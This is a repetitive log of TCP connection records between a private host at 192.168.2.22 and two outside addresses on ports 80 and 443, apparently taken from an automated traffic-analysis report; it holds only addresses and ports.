Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49162
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
Source: global traffic	TCP traffic: 104.21.74.191:443 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 107.174.146.46:80 -> 192.168.2.22:49164
